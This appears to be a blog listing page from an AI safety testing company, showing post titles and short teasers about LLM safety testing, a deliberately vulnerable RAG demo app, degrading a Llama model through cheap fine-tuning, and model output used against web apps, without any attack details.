Start LLM Safety Testing in 3 Easy Steps

GPT2 165M model has got 70/100 Score on Safety Testing

Pokebot, a Vulnerable RAG App!!

We are excited to announce the release of Pokebot (Poke a Bot)…

Effect of Poor Training Data on LLM Finetuning

How did we transform a Good Llama to a Bad Llama in just 200$, and in few hours?

Models Harmful Output Reflection Vulnerability

Is it possible to utilize Models / LLMs output to attack related components such as web apps? similar to XSS, CSRF, or SSRF?

© Detoxio AI Pvt Ltd. 2024